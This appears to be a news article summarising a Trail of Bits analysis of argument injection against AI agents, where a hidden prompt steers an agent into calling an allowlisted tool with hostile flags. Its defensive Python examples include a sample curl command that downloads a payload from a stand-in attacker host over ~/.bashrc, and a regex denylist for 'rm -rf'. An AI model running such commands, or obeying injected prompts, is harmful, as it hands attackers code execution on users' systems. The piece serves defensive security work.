AI Agents: Handy Helper or an Open Door for Hackers?
AI agents are stepping into the real world and getting access to files and the console. And this is where it gets interesting. Trail of Bits broke down how harmless-looking features...
AI-processed from Habr AI; edited by Hamidun News
Let's be honest: we all waited for the moment when AI would stop being just a chatty chatbot and start doing things. Booking tickets, debugging code, managing servers. The era of AI agents has arrived, but with it came a headache that many developers have carefully ignored. Trail of Bits dropped an analysis that hits like a cold shower: your "secure" agents are a potential security hole the size of the Grand Canyon.
The core of the problem is right on the surface, but we stubbornly refuse to see it. We give language models access to tools—the file system, the terminal, APIs. To sleep soundly, engineers typically build defenses out of "allowlists" of permitted commands and add a human into the decision-making chain. Like, if the AI wants to do something weird, the human will notice and stop it. Sounds logical? In practice, it crumbles to dust.
Trail of Bits showed how this breaks through argument injection. It's not a classic shell injection, where you just append malicious code to a command. Here everything is more subtle. The attacker manipulates the prompt so that the model calls a permitted utility, but with arguments that turn it into a weapon. Imagine you allowed the agent to use the `curl` command for connectivity checks, and under the influence of a hidden prompt it downloads a malicious script that then gets executed. Formally, the command was on the allowlist. In practice, you just gave the attacker RCE (remote code execution).
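To make the gap concrete, here is a minimal sketch of the difference between checking only the program name and checking the arguments too. Everything in it is an assumption for illustration: the function names, the allowlist contents, and the per-command flag policy are hypothetical, not taken from the Trail of Bits analysis. The only real-world detail is that `curl -o` writes the response to a file.

```python
import shlex

# Hypothetical allowlist: only the program name is checked.
ALLOWED_COMMANDS = {"curl", "ls", "cat"}

# Hypothetical stricter policy: the exact flags each command may use.
ALLOWED_FLAGS = {"curl": {"-I", "--head", "-s", "--silent"}}


def naive_is_allowed(command_line: str) -> bool:
    """Approve a command if its program name is on the allowlist."""
    argv = shlex.split(command_line)
    return bool(argv) and argv[0] in ALLOWED_COMMANDS


def strict_is_allowed(command_line: str) -> bool:
    """Approve only known flags plus exactly one https:// URL."""
    argv = shlex.split(command_line)
    if not argv or argv[0] not in ALLOWED_FLAGS:
        return False
    flags = [a for a in argv[1:] if a.startswith("-")]
    positionals = [a for a in argv[1:] if not a.startswith("-")]
    if any(f not in ALLOWED_FLAGS[argv[0]] for f in flags):
        return False
    return len(positionals) == 1 and positionals[0].startswith("https://")


# A connectivity check and an argument-injection attempt (hypothetical URLs).
benign = "curl -I https://example.com"
injected = "curl -o /home/user/.bashrc https://attacker.example/payload.sh"

print(naive_is_allowed(benign), naive_is_allowed(injected))
print(strict_is_allowed(benign), strict_is_allowed(injected))
```

The naive check approves both commands because both start with `curl`. The stricter check rejects the second one because `-o` is not in its flag policy. Even this version is only a sketch: a per-flag policy has to be maintained for every tool and is easy to get wrong, so it complements isolation rather than replacing it.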
It's particularly ironic to put faith in regex filters. Trying to filter LLM output with regular expressions is like trying to hold water in a sieve. Models are too variable, and the context is too complex for rigid regex logic to catch all variants of malicious behavior. This is an architectural anti-pattern that somehow continues to live in the production of many startups.
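A small sketch shows why. Assume a hypothetical denylist filter that tries to catch destructive deletes with a single pattern; the pattern and the function name are made up for illustration. The command variants use real GNU `rm` and `find` options.

```python
import re

# Hypothetical denylist: block the "obvious" destructive command.
DENY_PATTERN = re.compile(r"rm\s+-rf")


def regex_filter_blocks(command_line: str) -> bool:
    """Return True if the filter would block this command."""
    return DENY_PATTERN.search(command_line) is not None


candidates = [
    "rm -rf /data",                    # the form the filter expects
    "rm -r -f /data",                  # same effect, flags split
    "rm -fr /data",                    # same effect, flags reordered
    "rm --recursive --force /data",    # same effect, long options
    "find /data -delete",              # different tool, same outcome
]

for cmd in candidates:
    print(f"{cmd!r}: blocked={regex_filter_blocks(cmd)}")
```

Only the first variant is blocked. Each bypass can be patched with another pattern, but a model can produce equivalent spellings faster than anyone can enumerate them.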
What about "human in the loop"? This only works in an ideal world. In reality, users suffer from decision fatigue. When the agent asks for confirmation on a harmless action for the tenth time, vigilance dulls. And if the attack is disguised skillfully, even an experienced engineer might not notice the trick in a set of command-line flags. We shift responsibility to the user, who is often the weakest link.
What does this mean for the industry? We're approaching a point where naive AI agent design becomes dangerous. Simply bolting LangChain onto a terminal and hoping for the best is no longer an option. We need complete execution environment isolation (sandboxing), strict privilege restriction at the OS level rather than the application level, and a rejection of the illusion that LLMs can moderate themselves.
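As one possible illustration of OS-level restriction, the sketch below wraps every tool call in a locked-down container. Docker is an assumption here (the source does not name a sandboxing technology), and the image name `agent-tools:latest`, the helper name, and the specific limits are hypothetical. The flags themselves are standard `docker run` options.

```python
from typing import List


def sandboxed_argv(tool_argv: List[str], image: str = "agent-tools:latest") -> List[str]:
    """Build a `docker run` command that executes tool_argv with minimal privileges.

    The image name is a hypothetical placeholder for an image that
    contains only the tools the agent is supposed to use.
    """
    return [
        "docker", "run", "--rm",
        "--network", "none",                    # no network access
        "--read-only",                          # read-only root filesystem
        "--cap-drop", "ALL",                    # drop all Linux capabilities
        "--security-opt", "no-new-privileges",  # block privilege escalation
        "--user", "65534:65534",                # run as an unprivileged uid:gid
        "--pids-limit", "64",                   # cap the number of processes
        "--memory", "256m",                     # cap memory usage
        image,
        *tool_argv,
    ]


# The agent's requested command is passed as a list, never through a shell.
print(sandboxed_argv(["ls", "-la", "/workspace"]))
```

The resulting list can be handed to `subprocess.run(..., timeout=30)`. The point of the design is that the limits are enforced by the kernel and the container runtime, so they still hold when the model, the allowlist, and the human reviewer have all been fooled.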
The key point: AI agent security cannot be built on trust in the model or user. If your agent has access to the real world, assume it's already compromised. Are you ready for your "smart assistant" to delete the production database?